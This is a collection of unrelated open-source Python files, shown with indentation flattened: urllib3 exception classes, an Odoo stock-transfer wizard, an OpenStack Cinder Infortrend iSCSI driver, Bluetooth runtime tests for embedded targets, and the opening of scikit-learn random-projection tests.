"""Raised when an existing pool gets a request for a foreign host."""
def __init__(
self, pool: "ConnectionPool", url: str, retries: Union["Retry", int] = 3
) -> None:
message = f"Tried to open a foreign host with url: {url}"
super().__init__(pool, url, message)
self.retries = retries
class TimeoutStateError(HTTPError):
"""Raised when passing an invalid state to a timeout"""
pass
class TimeoutError(HTTPError):
"""Raised when a socket timeout error occurs.
Catching this error will catch both :exc:`ReadTimeoutErrors
<ReadTimeoutError>` and :exc:`ConnectTimeoutErrors <ConnectTimeoutError>`.
"""
pass
class ReadTimeoutError(TimeoutError, RequestError):
"""Raised when a socket timeout occurs while receiving data from a server"""
pass
# This timeout error does not have a URL attached and needs to inherit from the
# base HTTPError
class ConnectTimeoutError(TimeoutError):
"""Raised when a socket timeout occurs while connecting to a server"""
pass
class NewConnectionError(ConnectTimeoutError, HTTPError):
"""Raised when we fail to establish a new connection. Usually ECONNREFUSED."""
def __init__(self, conn: "HTTPConnection", message: str) -> None:
self.conn = conn
super().__init__(f"{conn}: {message}")
@property
def pool(self) -> "HTTPConnection":
warnings.warn(
"The 'pool' property is deprecated and will be removed "
"in a later urllib3 v2.x release. use 'conn' instead.",
DeprecationWarning,
stacklevel=2,
)
return self.conn
class NameResolutionError(NewConnectionError):
"""Raised when host name resolution fails."""
def __init__(self, host: str, conn: "HTTPConnection", reason: socket.gaierror):
message = f"Failed to resolve '{host}' ({reason})"
super().__init__(conn, message)
class EmptyPoolError(PoolError):
"""Raised when a pool runs out of connections and no more are allowed."""
pass
class FullPoolError(PoolError):
"""Raised when we try to add a connection to a full pool in blocking mode."""
pass
class ClosedPoolError(PoolError):
"""Raised when a request enters a pool after the pool has been closed."""
pass
class LocationValueError(ValueError, HTTPError):
"""Raised when there is something wrong with a given URL input."""
pass
class LocationParseError(LocationValueError):
"""Raised when get_host or similar fails to parse the URL input."""
def __init__(self, location: str) -> None:
message = f"Failed to parse: {location}"
super().__init__(message)
self.location = location
class URLSchemeUnknown(LocationValueError):
"""Raised when a URL input has an unsupported scheme."""
def __init__(self, scheme: str):
message = f"Not supported URL scheme {scheme}"
super().__init__(message)
self.scheme = scheme
class ResponseError(HTTPError):
"""Used as a container for an error reason supplied in a MaxRetryError."""
GENERIC_ERROR = "too many error responses"
SPECIFIC_ERROR = "too many {status_code} error responses"
class SecurityWarning(HTTPWarning):
"""Warned when performing security reducing actions"""
pass
class InsecureRequestWarning(SecurityWarning):
"""Warned when making an unverified HTTPS request."""
pass
class SystemTimeWarning(SecurityWarning):
"""Warned when system time is suspected to be wrong"""
pass
class InsecurePlatformWarning(SecurityWarning):
"""Warned when certain TLS/SSL configuration is not available on a platform."""
pass
class SNIMissingWarning(HTTPWarning):
"""Warned when making a HTTPS request without SNI available."""
pass
class DependencyWarning(HTTPWarning):
"""
Warned when an attempt is made to import a module with missing optional
dependencies.
"""
pass
class ResponseNotChunked(ProtocolError, ValueError):
"""Response needs to be chunked in order to read it as chunks."""
pass
class BodyNotHttplibCompatible(HTTPError):
"""
Body should be :class:`http.client.HTTPResponse` like
(have an fp attribute which returns raw chunks) for read_chunked().
"""
pass
class IncompleteRead(HTTPError, httplib_IncompleteRead):
"""
Response length doesn't match expected Content-Length
Subclass of :class:`http.client.IncompleteRead` to allow int value
for ``partial`` to avoid creating large objects on streamed reads.
"""
def __init__(self, partial: int, expected: int) -> None:
self.partial = partial
self.expected = expected
def __repr__(self) -> str:
return "IncompleteRead(%i bytes read, %i more expected)" % (
self.partial,
self.expected,
)
class InvalidChunkLength(HTTPError, httplib_IncompleteRead):
"""Invalid chunk length in a chunked response."""
def __init__(self, response: "HTTPResponse", length: bytes) -> None:
self.partial: int = response.tell()
self.expected: Optional[int] = response.length_remaining
self.response = response
self.length = length
def __repr__(self) -> str:
return "InvalidChunkLength(got length %r, %i bytes read)" % (
self.length,
self.partial,
)
class InvalidHeader(HTTPError):
"""The header provided was somehow invalid."""
pass
class ProxySchemeUnknown(AssertionError, URLSchemeUnknown):
"""ProxyManager does not support the supplied scheme"""
# TODO(t-8ch): Stop inheriting from AssertionError in v2.0.
def __init__(self, scheme: Optional[str]) -> None:
# 'localhost' is here because our URL parser parses
# localhost:8080 -> scheme=localhost, remove if we fix this.
if scheme == "localhost":
scheme = None
if scheme is None:
message = "Proxy URL had no scheme, should start with http:// or https://"
else:
message = f"Proxy URL had unsupported scheme {scheme}, should use http:// or https://"
super().__init__(message)
class ProxySchemeUnsupported(ValueError):
"""Fetching HTTPS resources through HTTPS proxies is unsupported"""
pass
class HeaderParsingError(HTTPError):
"""Raised by assert_header_parsing, but we convert it to a log.warning statement."""
def __init__(
self, defects: List[MessageDefect], unparsed_data: Optional[Union[bytes, str]]
) -> None:
message = f"{defects or 'Unknown'}, unparsed data: {unparsed_data!r}"
super().__init__(message)
class UnrewindableBodyError(HTTPError):
"""urllib3 encountered an error when trying to rewind a body"""
pass
|
|
from openerp import netsvc
from openerp import models, fields, api
from openerp.tools.translate import _
import openerp.addons.decimal_precision as dp
from datetime import datetime
from openerp.osv import osv
import time
class wizard_stock_internal_transfer(models.TransientModel):
_name = 'wizard.stock.internal.transfer'
transfer_id = fields.Many2one('stock.internal.transfer', 'Transfer')
item_ids = fields.One2many('stock.internal.transfer.items', 'transfer_id', 'Items')
def default_get(self, cr, uid, fields, context=None):
if context is None: context = {}
res = super(wizard_stock_internal_transfer, self).default_get(cr, uid, fields, context=context)
transfer_ids = context.get('active_ids', [])
active_model = context.get('active_model')
if not transfer_ids or len(transfer_ids) != 1:
# Partial Picking Processing may only be done for one picking at a time
return res
assert active_model in ('stock.internal.transfer'), 'Bad context propagation'
transfer_id, = transfer_ids
transfers = self.pool.get('stock.internal.transfer').browse(cr, uid, transfer_id, context=context)
company_id = self.pool.get('res.users').browse(cr, uid, uid).company_id.id
company = self.pool.get('res.company').browse(cr, uid, company_id)
items = []
if not company.transit_location_id:
raise osv.except_osv(_('Error!'), _('Please setup your stock transit location in Setting - Internal Transfer Configuration'))
if transfers.state == 'draft':
source_location_id = transfers.source_warehouse_id.lot_stock_id.id
dest_location_id = company.transit_location_id.id
elif transfers.state == 'send':
source_location_id = company.transit_location_id.id
dest_location_id = transfers.dest_warehouse_id.lot_stock_id.id
for transfer in transfers.line_ids:
item = {
'product_id': transfer.product_id.id,
'product_uom_id': transfer.product_uom_id.id,
'product_qty': transfer.product_qty,
'source_location_id': source_location_id,
# 'transit_location_id': transit_location_id,
'dest_location_id' : dest_location_id,
}
if transfer.product_id:
items.append(item)
res.update(item_ids=items)
# raise osv.except_osv(_('Warning !'),_('adsfasdfasdf'))
return res
def button_confirm(self, cr, uid, ids, context):
for tf in self.browse(cr, uid, ids):
if 'active_ids' in context:
transfer = self.pool.get('stock.internal.transfer').browse(cr, uid, context.get('active_ids')[0])
if transfer.state == 'draft':
backorders = []
user_list = []
user_ids = transfer.source_warehouse_id.user_ids
if user_ids :
for user in user_ids :
user_list.append(user.id)
if uid not in user_list:
raise osv.except_osv(_('Warning !'),_('You are not authorized to send or receive products !'))
for line in tf.item_ids:
for trans in transfer.line_ids:
if line.product_id.id == trans.product_id.id:
if line.product_qty > trans.product_qty:
raise osv.except_osv(_('Error!'), _('You have exceed the available product quantity.'))
elif line.product_qty < trans.product_qty:
backorder = {
'product_id' : line.product_id.id,
'product_qty' : trans.product_qty - line.product_qty,
'product_uom_id' : line.product_uom_id.id,
'state' : 'draft',
}
backorders.append(backorder)
self.pool.get('stock.internal.transfer.line').write(cr, uid, trans.id, {
'product_qty' : line.product_qty
})
if backorders:
create_id = self.pool.get('stock.internal.transfer').create(cr, uid, {
'date' : time.strftime('%Y-%m-%d %H:%M:%S'),
'source_location_id' : transfer.source_location_id.id,
'dest_location_id' : transfer.dest_location_id.id,
'backorder_id' : context.get('active_ids')[0],
'state' : 'draft',
})
for backorder in backorders:
backorder['transfer_id'] = create_id
self.pool.get('stock.internal.transfer.line').create(cr, uid, backorder)
type_obj = self.pool.get('stock.picking.type')
type_ids = type_obj.search(cr, uid, [('default_location_src_id', '=', transfer.source_warehouse_id.lot_stock_id.id),
('code', '=', 'outgoing')])
if type_ids:
types = type_obj.browse(cr, uid, type_ids[0])
picking_obj = self.pool.get('stock.picking')
picking_id = picking_obj.create(cr, uid, {
'picking_type_id' : types.id,
'transfer_id' : context.get('active_ids')[0]
})
else:
raise osv.except_osv(_('Error!'), _('Unable to find source location in Stock Picking.'))
move_obj = self.pool.get('stock.move')
for line in tf.item_ids:
move_obj.create(cr,uid,{
'name' : 'Stock Internal Transfer',
'product_id' : line.product_id.id,
'product_uom' : line.product_uom_id.id,
'product_uom_qty' : line.product_qty,
'location_id' : line.source_location_id.id,
'location_dest_id' : line.dest_location_id.id,
'picking_id' : picking_id,
})
picking_obj = self.pool.get('stock.picking')
picking_obj.action_confirm(cr, uid, picking_id)
picking_obj.action_assign(cr, uid, picking_id)
picking_obj.do_internal_transfer_details(cr, uid, picking_id)
wkf_service = netsvc.LocalService('workflow')
wkf_service.trg_validate(uid, 'stock.internal.transfer', context.get('active_ids')[0], 'action_send', cr)
elif transfer.state == 'send':
backorders = []
user_list = []
user_ids = transfer.dest_warehouse_id.user_ids
if user_ids :
for user in user_ids :
user_list.append(user.id)
if uid not in user_list:
raise osv.except_osv(_('Warning !'),_('You are not authorized to send or receive products !'))
for line in tf.item_ids:
for trans in transfer.line_ids:
if line.product_id.id == trans.product_id.id:
if line.product_qty > trans.product_qty:
raise osv.except_osv(_('Error!'), _('You have exceed the available product quantity.'))
elif line.product_qty < trans.product_qty:
backorder = {
'product_id' : line.product_id.id,
'product_qty' : trans.product_qty - line.product_qty,
'product_uom_id' : line.product_uom_id.id,
'state' : 'draft',
}
backorders.append(backorder)
if backorders:
create_id = self.pool.get('stock.internal.transfer').create(cr, uid, {
'date' : time.strftime('%Y-%m-%d %H:%M:%S'),
'source_location_id' : transfer.source_location_id.id,
'dest_location_id' : transfer.dest_location_id.id,
'backorder_id' : context.get('active_ids')[0],
'state' : 'send',
})
for backorder in backorders:
backorder['transfer_id'] = create_id
self.pool.get('stock.internal.transfer.line').create(cr, uid, backorder)
wkf_service.trg_validate(uid, 'stock.internal.transfer', create_id, 'action_send', cr)
type_obj = self.pool.get('stock.picking.type')
type_ids = type_obj.search(cr, uid, [('default_location_dest_id', '=', transfer.dest_warehouse_id.lot_stock_id.id),
('code', '=', 'incoming')])
if type_ids:
types = type_obj.browse(cr, uid, type_ids[0])
picking_obj = self.pool.get('stock.picking')
picking_id = picking_obj.create(cr, uid, {
'picking_type_id' : types.id,
'transfer_id' : context.get('active_ids')[0]
})
else:
raise osv.except_osv(_('Error!'), _('Unable to find destination location in Stock Picking.'))
move_obj = self.pool.get('stock.move')
for line in tf.item_ids:
move_obj.create(cr,uid,{
'name' : 'Stock Internal Transfer',
'product_id' : line.product_id.id,
'product_uom' : line.product_uom_id.id,
'product_uom_qty' : line.product_qty,
'location_id' : line.source_location_id.id,
'location_dest_id' : line.dest_location_id.id,
'picking_id' : picking_id,
})
picking_obj = self.pool.get('stock.picking')
picking_obj.action_confirm(cr, uid, picking_id)
picking_obj.action_assign(cr, uid, picking_id)
picking_obj.do_internal_transfer_details(cr, uid, picking_id)
wkf_service = netsvc.LocalService('workflow')
wkf_service.trg_validate(uid, 'stock.internal.transfer', context.get('active_ids')[0], 'action_receive', cr)
return True
@api.multi
def wizard_view(self):
view = self.env.ref('sgeede_internal_transfer.wizard_stock_internal_transfer_view')
return {
'name': _('Enter Transfer Details'),
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'wizard.stock.internal.transfer',
'views': [(view.id, 'form')],
'view_id': view.id,
'target': 'new',
'res_id': self.ids[0],
'context': self.env.context,
}
class stock_internal_transfer_items(models.TransientModel):
_name = 'stock.internal.transfer.items'
transfer_id = fields.Many2one('wizard.stock.internal.transfer', 'Transfer')
product_id = fields.Many2one('product.product', 'Product')
product_qty = fields.Float('Quantity')
product_uom_id = fields.Many2one('product.uom', 'Unit of Measure')
source_location_id = fields.Many2one('stock.location', 'Source Location')
transit_location_id = fields.Many2one('stock.location', 'Transit Location')
dest_location_id = fields.Many2one('stock.location', 'Destination Location')
def product_id_change(self, cr, uid, ids, product_id, context=None):
""" Finds UoM of changed product.
@param product_id: Id of changed product.
@return: Dictionary of values.
"""
result = {}
if not product_id:
return {'value': {
'product_uom_id': False,
}}
product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
product_uom_id = product.uom_id and product.uom_id.id or False
result['value'] = {'product_uom_id': product_uom_id}
return result
|
|
# Copyright (c) 2015 Infortrend Technology, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
iSCSI Driver for Infortrend Eonstor based on CLI.
"""
from oslo_log import log as logging
from cinder.volume import driver
from cinder.volume.drivers.infortrend.eonstor_ds_cli import common_cli
LOG = logging.getLogger(__name__)
class InfortrendCLIISCSIDriver(driver.ISCSIDriver):
"""Infortrend iSCSI Driver for Eonstor DS using CLI.
Version history:
1.0.0 - Initial driver
1.0.1 - Support DS4000
"""
def __init__(self, *args, **kwargs):
super(InfortrendCLIISCSIDriver, self).__init__(*args, **kwargs)
self.common = common_cli.InfortrendCommon(
'iSCSI', configuration=self.configuration)
self.VERSION = self.common.VERSION
def check_for_setup_error(self):
LOG.debug('check_for_setup_error start')
self.common.check_for_setup_error()
def create_volume(self, volume):
"""Creates a volume.
Can optionally return a Dictionary of changes
to the volume object to be persisted.
"""
LOG.debug('create_volume volume id=%(volume_id)s', {
'volume_id': volume['id']})
return self.common.create_volume(volume)
def create_volume_from_snapshot(self, volume, snapshot):
"""Creates a volume from a snapshot."""
LOG.debug(
'create_volume_from_snapshot volume id=%(volume_id)s '
'snapshot id=%(snapshot_id)s', {
'volume_id': volume['id'], 'snapshot_id': snapshot['id']})
return self.common.create_volume_from_snapshot(volume, snapshot)
def create_cloned_volume(self, volume, src_vref):
"""Creates a clone of the specified volume."""
LOG.debug(
'create_cloned_volume volume id=%(volume_id)s '
'src_vref provider_location=%(provider_location)s', {
'volume_id': volume['id'],
'provider_location': src_vref['provider_location']})
return self.common.create_cloned_volume(volume, src_vref)
def extend_volume(self, volume, new_size):
"""Extend a volume."""
LOG.debug(
'extend_volume volume id=%(volume_id)s new size=%(size)s', {
'volume_id': volume['id'], 'size': new_size})
self.common.extend_volume(volume, new_size)
def delete_volume(self, volume):
"""Deletes a volume."""
LOG.debug('delete_volume volume id=%(volume_id)s', {
'volume_id': volume['id']})
return self.common.delete_volume(volume)
def migrate_volume(self, ctxt, volume, host):
"""Migrate the volume to the specified host.
Returns a boolean indicating whether the migration occurred, as well as
model_update.
:param ctxt: Context
:param volume: A dictionary describing the volume to migrate
:param host: A dictionary describing the host to migrate to, where
host['host'] is its name, and host['capabilities'] is a
dictionary of its reported capabilities.
"""
LOG.debug('migrate_volume volume id=%(volume_id)s host=%(host)s', {
'volume_id': volume['id'], 'host': host['host']})
return self.common.migrate_volume(volume, host)
def create_snapshot(self, snapshot):
"""Creates a snapshot."""
LOG.debug(
'create_snapshot snapshot id=%(snapshot_id)s '
'volume_id=%(volume_id)s', {
'snapshot_id': snapshot['id'],
'volume_id': snapshot['volume_id']})
return self.common.create_snapshot(snapshot)
def delete_snapshot(self, snapshot):
"""Deletes a snapshot."""
LOG.debug(
'delete_snapshot snapshot id=%(snapshot_id)s '
'volume_id=%(volume_id)s', {
'snapshot_id': snapshot['id'],
'volume_id': snapshot['volume_id']})
self.common.delete_snapshot(snapshot)
def ensure_export(self, context, volume):
"""Synchronously recreates an export for a volume."""
pass
def create_export(self, context, volume):
"""Exports the volume.
Can optionally return a Dictionary of changes
to the volume object to be persisted.
"""
LOG.debug(
'create_export volume provider_location=%(provider_location)s', {
'provider_location': volume['provider_location']})
return self.common.create_export(context, volume)
def remove_export(self, context, volume):
"""Removes an export for a volume."""
pass
def initialize_connection(self, volume, connector):
"""Initializes the connection and returns connection information.
The iscsi driver returns a driver_volume_type of 'iscsi'.
The format of the driver data is defined in _get_iscsi_properties.
Example return value::
{
'driver_volume_type': 'iscsi'
'data': {
'target_discovered': True,
'target_iqn': 'iqn.2010-10.org.openstack:volume-00000001',
'target_portal': '127.0.0.0.1:3260',
'volume_id': 1,
'access_mode': 'rw'
}
}
"""
LOG.debug(
'initialize_connection volume id=%(volume_id)s '
'connector initiator=%(initiator)s', {
'volume_id': volume['id'],
'initiator': connector['initiator']})
return self.common.initialize_connection(volume, connector)
def terminate_connection(self, volume, connector, **kwargs):
"""Disallow connection from connector."""
LOG.debug('terminate_connection volume id=%(volume_id)s', {
'volume_id': volume['id']})
self.common.terminate_connection(volume, connector)
def get_volume_stats(self, refresh=False):
"""Get volume stats.
If 'refresh' is True, run update the stats first.
"""
LOG.debug('get_volume_stats refresh=%(refresh)s', {
'refresh': refresh})
return self.common.get_volume_stats(refresh)
def manage_existing(self, volume, existing_ref):
"""Manage an existing lun in the array.
The lun should be in a manageable pool backend, otherwise
error would return.
Rename the backend storage object so that it matches the,
volume['name'] which is how drivers traditionally map between a
cinder volume and the associated backend storage object.
existing_ref:{
'id':lun_id
}
"""
LOG.debug(
'manage_existing volume id=%(volume_id)s '
'existing_ref source id=%(source_id)s', {
'volume_id': volume['id'],
'source_id': existing_ref['source-id']})
return self.common.manage_existing(volume, existing_ref)
def unmanage(self, volume):
"""Removes the specified volume from Cinder management.
Does not delete the underlying backend storage object.
:param volume: Cinder volume to unmanage
"""
LOG.debug('unmanage volume id=%(volume_id)s', {
'volume_id': volume['id']})
self.common.unmanage(volume)
def manage_existing_get_size(self, volume, existing_ref):
"""Return size of volume to be managed by manage_existing.
When calculating the size, round up to the next GB.
"""
LOG.debug(
'manage_existing_get_size volume id=%(volume_id)s '
'existing_ref source id=%(source_id)s', {
'volume_id': volume['id'],
'source_id': existing_ref['source-id']})
return self.common.manage_existing_get_size(volume, existing_ref)
def retype(self, ctxt, volume, new_type, diff, host):
"""Convert the volume to be of the new type.
:param ctxt: Context
:param volume: A dictionary describing the volume to migrate
:param new_type: A dictionary describing the volume type to convert to
:param diff: A dictionary with the difference between the two types
:param host: A dictionary describing the host to migrate to, where
host['host'] is its name, and host['capabilities'] is a
dictionary of its reported capabilities.
"""
LOG.debug(
'retype volume id=%(volume_id)s new_type id=%(type_id)s', {
'volume_id': volume['id'], 'type_id': new_type['id']})
return self.common.retype(ctxt, volume, new_type, diff, host)
def update_migrated_volume(self, ctxt, volume, new_volume,
original_volume_status):
"""Return model update for migrated volume.
:param volume: The original volume that was migrated to this backend
:param new_volume: The migration volume object that was created on
this backend as part of the migration process
:param original_volume_status: The status of the original volume
:return model_update to update DB with any needed changes
"""
LOG.debug(
'update migrated volume original volume id= %(volume_id)s '
'new volume id=%(new_volume_id)s', {
'volume_id': volume['id'], 'new_volume_id': new_volume['id']})
return self.common.update_migrated_volume(ctxt, volume, new_volume,
original_volume_status)
|
|
import os
import time
import subprocess
from oeqa.runtime.bluetooth import bluetooth
from oeqa.oetest import oeRuntimeTest
from oeqa.utils.helper import shell_cmd_timeout
from oeqa.utils.helper import get_files_dir
class CommBTTestMNode(oeRuntimeTest):
"""
@class CommBTTestMNode
"""
@classmethod
def setUpClass(cls):
'''Copy gatttool to /tmp/ folder
@fn setUpClass
@param cls
@return
'''
bt1=bluetooth.BTFunction(cls.tc.targets[0])
bt2=bluetooth.BTFunction(cls.tc.targets[1])
copy_to_path = os.path.join(get_files_dir(), 'gatttool')
cls.tc.targets[0].copy_to(copy_to_path, "/tmp/")
bt1.target.run('chmod +x /tmp/gatttool')
bt2.target.run('chmod +x /tmp/gatttool')
def setUp(self):
"""
@fn setUp
@param self
@return
"""
self.bt1 = bluetooth.BTFunction(self.targets[0])
self.bt2 = bluetooth.BTFunction(self.targets[1])
self.bt1.target_hciconfig_init()
self.bt2.target_hciconfig_init()
def test_bt_gatt_read_primary(self):
'''Use gatttool to show remote primary attr handles
@fn test_bt_gatt_read_primary
@param self
@return
'''
for i in range(3):
self.bt2.target_hciconfig_init()
self.bt2.set_leadv()
(status, output) = self.bt1.gatt_basic_check(self.bt2.get_bt_mac(), 'primary')
if status == 0:
break
self.assertEqual(status, 0, msg="gatttool Primary is wrong: %s" % output)
def test_bt_gatt_read_characteristics(self):
'''Use gatttool to show target characteristics handles
@fn test_bt_gatt_read_characteristics
@param self
@return
'''
for i in range(3):
self.bt2.target_hciconfig_init()
self.bt2.set_leadv()
(status, output) = self.bt1.gatt_basic_check(self.bt2.get_bt_mac(), 'characteristics')
if status == 0:
break
self.assertEqual(status, 0, msg="gatttool characteristics fails: %s" % output)
def test_bt_gatt_read_handle(self):
'''Use gatttool to read target handle value
@fn test_bt_gatt_read_handle
@param self
@return
'''
for i in range(3):
self.bt2.target_hciconfig_init()
self.bt2.set_leadv()
(status, output) = self.bt1.gatt_basic_check(self.bt2.get_bt_mac(), 'handle')
if status == 0:
break
self.assertEqual(status, 0, msg="gatttool read handle fails: %s" % output)
def test_bt_gatt_connect(self):
'''Use gatttool interactive mode to do connect
@fn test_bt_gatt_connect
@param self
@return
'''
for i in range(3):
self.bt2.target_hciconfig_init()
self.bt2.set_leadv()
(status, output) = self.bt1.gatt_basic_check(self.bt2.get_bt_mac(), 'connect')
if status == 2:
break
self.assertEqual(status, 2, msg="gatttool connect fails: %s" % output)
def test_bt_remote_gatt_read_primary(self):
'''Use gatttool to show host primary attr handles
@fn test_bt_remote_gatt_read_primary
@param self
@return
'''
for i in range(3):
self.bt1.target_hciconfig_init()
self.bt1.set_leadv()
(status, output) = self.bt2.gatt_basic_check(self.bt1.get_bt_mac(), 'primary')
if status == 0:
break
self.assertEqual(status, 0, msg="gatttool be read primary fails: %s" % output)
def test_bt_remote_gatt_read_characteristics(self):
'''Use gatttool to show host characteristics handles
@fn test_bt_remote_gatt_read_characteristics
@param self
@return
'''
for i in range(3):
self.bt1.target_hciconfig_init()
self.bt1.set_leadv()
(status, output) = self.bt2.gatt_basic_check(self.bt1.get_bt_mac(), 'characteristics')
if status == 0:
break
self.assertEqual(status, 0, msg="gatttool be read characteristics fails: %s" % output)
def test_bt_remote_gatt_read_handle(self):
'''Use gatttool to read host handle value
@fn test_bt_remote_gatt_read_handle
@param self
@return
'''
for i in range(3):
self.bt1.target_hciconfig_init()
self.bt1.set_leadv()
(status, output) = self.bt2.gatt_basic_check(self.bt1.get_bt_mac(), 'handle')
if status == 0:
break
self.assertEqual(status, 0, msg="gatttool be read handle fails: %s" % output)
def test_bt_remote_gatt_connect(self):
'''Use gatttool interactive mode to do connect to host
@fn test_bt_remote_gatt_connect
@param self
@return
'''
for i in range(3):
self.bt1.target_hciconfig_init()
self.bt1.set_leadv()
(status, output) = self.bt2.gatt_basic_check(self.bt1.get_bt_mac(), 'connect')
if status == 2:
break
self.assertEqual(status, 2, msg="gatttool be connected fails: %s" % output)
def test_bt_visible(self):
'''Do traditional visible and be scanned by other (not ble scan)
@fn test_bt_visible
@param self
@return
'''
self.bt1.target.run('hciconfig hci0 noleadv')
for i in range(3):
# For init function already set visible status, directly be scanned.
exp = os.path.join(os.path.dirname(__file__), "files/bt_scan.exp")
cmd = "expect %s %s %s" % (exp, self.bt2.target.ip, self.bt1.get_bt_mac())
status, output = shell_cmd_timeout(cmd, timeout=100)
if status == 2:
break
if type(output) is bytes:
output = output.decode("ascii")
self.assertEqual(status, 2, msg="Scan remote device fails: %s" % output)
def test_bt_scan(self):
'''Scan nearby bluetooth devices (not ble scan)
@fn test_bt_scan
@param self
@return
'''
self.bt2.target.run('hciconfig hci0 noleadv')
for i in range(3):
# For init function already set visible status, directly be scanned.
exp = os.path.join(os.path.dirname(__file__), "files/bt_scan.exp")
cmd = "expect %s %s %s" % (exp, self.bt1.target.ip, self.bt2.get_bt_mac())
status, output = shell_cmd_timeout(cmd, timeout=100)
if status == 2:
break
if type(output) is bytes:
output = output.decode("ascii")
self.assertEqual(status, 2, msg="Scan remote device fails: %s" % output)
def test_bt_le_advertising(self):
'''Target does LE advertising, another device scans it
@fn test_bt_le_advertising
@param self
@return
'''
for i in range(3):
# close legacy iscan mode
self.bt1.target.run('hciconfig hci0 noscan')
# begin low-energy scan
self.bt1.target.run('hciconfig hci0 leadv')
time.sleep(1)
# Another device starts bluetoothctl to scan target
exp = os.path.join(os.path.dirname(__file__), "files/bt_scan.exp")
cmd = "expect %s %s %s" % (exp, self.bt2.target.ip, self.bt1.get_bt_mac())
status, output = shell_cmd_timeout(cmd, timeout=100)
if status == 2:
break
else:
self.bt1.target.run('hciconfig hci0 reset')
time.sleep(3)
if type(output) is bytes:
output = output.decode("ascii")
self.assertEqual(status, 2, msg="Be LE-scanned fails: %s" % output)
def test_bt_le_scan(self):
'''Another device (host) does LE advertising, target scans it
@fn test_bt_le_scan
@param self
@return
'''
for i in range(3):
# close legacy iscan mode
self.bt2.target.run('hciconfig hci0 noscan')
# begin low-energy scan
self.bt2.target.run('hciconfig hci0 leadv')
time.sleep(1)
# Device starts bluetoothctl to scan others
exp = os.path.join(os.path.dirname(__file__), "files/bt_scan.exp")
cmd = "expect %s %s %s" % (exp, self.bt1.target.ip, self.bt2.get_bt_mac())
status, output = shell_cmd_timeout(cmd, timeout=100)
if status == 2:
break
else:
self.bt2.target.run('hciconfig hci0 reset')
time.sleep(3)
if type(output) is bytes:
output = output.decode("utf-8")
self.assertEqual(status, 2, msg="LE Scan other fails: %s" % output)
def test_bt_pairing(self):
'''Use bluetoothctl to pair IoT device with host
@fn test_bt_pairing
@param self
@return
'''
# On remote, start pair_slave in back-ground
slave_exp = os.path.join(os.path.dirname(__file__), "files/bt_pair_slave_on_iot.exp")
cmd = "%s %s %s" % (slave_exp, self.bt2.target.ip, self.bt1.get_bt_mac())
subprocess.Popen(cmd, shell=True)
# On target, perform pair_master
master_exp = os.path.join(os.path.dirname(__file__), "files/bt_pair_master.exp")
cmd = "expect %s %s %s" % (master_exp, self.bt1.target.ip, self.bt2.get_bt_mac())
for i in range(3):
(status, output) = shell_cmd_timeout(cmd, timeout=200)
if status == 2:
break
if type(output) is bytes:
output = output.decode("utf-8")
self.assertEqual(status, 2, msg="expect excution fail: %s" % output)
# On target, check paired devices to see if IoT is in
check_exp = os.path.join(os.path.dirname(__file__), "files/bt_list_paired_device.exp")
(status, output) = shell_cmd_timeout("%s %s | grep '^Device %s'" % (check_exp, self.bt1.target.ip, self.bt2.get_bt_mac()), timeout=20)
self.assertEqual(status, 0, msg="Not found IoT device paired")
##
# @}
# @}
##
|
|
import functools
from typing import List, Any
import numpy as np
import scipy.sparse as sp
import pytest
from sklearn.metrics import euclidean_distances
from sklearn.random_projection import johnson_lindenstrauss_min_dim
from sklearn.random_projection import _gaussian_random_matrix
from sklearn.random_projection import _sparse_random_matrix
from sklearn.random_projection import SparseRandomProjection
from sklearn.random_projection import GaussianRandomProjection
from sklearn.utils._testing import assert_raises
from sklearn.utils._testing import assert_raise_message
from sklearn.utils._testing import assert_array_equal
from sklearn.utils._testing import assert_almost_equal
from sklearn.utils._testing import assert_array_almost_equal
from sklearn.utils._testing import assert_warns
from sklearn.exceptions import DataDimensionalityWarning
all_sparse_random_matrix: List[Any] = [_sparse_random_matrix]
all_dense_random_matrix: List[Any] = [_gaussian_random_matrix]
all_random_matrix = all_sparse_random_matrix + all_dense_random_matrix
all_SparseRandomProjection: List[Any] = [SparseRandomProjection]
all_DenseRandomProjection: List[Any] = [GaussianRandomProjection]
all_RandomProjection = set(all_SparseRandomProjection +
all_DenseRandomProjection)
# Make some random data with uniformly located non zero entries with
# Gaussian distributed values
def make_sparse_random_data(n_samples, n_features, n_nonzeros):
rng = np.random.RandomState(0)
data_coo = sp.coo_matrix(
(rng.randn(n_nonzeros),
(rng.randint(n_samples, size=n_nonzeros),
rng.randint(n_features, size=n_nonzeros))),
shape=(n_samples, n_features))
return data_coo.toarray(), data_coo.tocsr()
def densify(matrix):
if not sp.issparse(matrix):
return matrix
else:
return matrix.toarray()
n_samples, n_features = (10, 1000)
n_nonzeros = int(n_samples * n_features / 100.)
data, data_csr = make_sparse_random_data(n_samples, n_features, n_nonzeros)
###############################################################################
# test on JL lemma
###############################################################################
def test_invalid_jl_domain():
assert_raises(ValueError, johnson_lindenstrauss_min_dim, 100, eps=1.1)
assert_raises(ValueError, johnson_lindenstrauss_min_dim, 100, eps=0.0)
assert_raises(ValueError, johnson_lindenstrauss_min_dim, 100, eps=-0.1)
assert_raises(ValueError, johnson_lindenstrauss_min_dim, 0, eps=0.5)
def test_input_size_jl_min_dim():
assert_raises(ValueError, johnson_lindenstrauss_min_dim,
3 * [100], eps=2 * [0.9])
assert_raises(ValueError, johnson_lindenstrauss_min_dim, 3 * [100],
eps=2 * [0.9])
johnson_lindenstrauss_min_dim(np.random.randint(1, 10, size=(10, 10)),
eps=np.full((10, 10), 0.5))
###############################################################################
# tests random matrix generation
###############################################################################
def check_input_size_random_matrix(random_matrix):
assert_raises(ValueError, random_matrix, 0, 0)
assert_raises(ValueError, random_matrix, -1, 1)
assert_raises(ValueError, random_matrix, 1, -1)
assert_raises(ValueError, random_matrix, 1, 0)
assert_raises(ValueError, random_matrix, -1, 0)
def check_size_generated(random_matrix):
assert random_matrix(1, 5).shape == (1, 5)
assert random_matrix(5, 1).shape == (5, 1)
assert random_matrix(5, 5).shape == (5, 5)
assert random_matrix(1, 1).shape == (1, 1)
def check_zero_mean_and_unit_norm(random_matrix):
# All random matrix should produce a transformation matrix
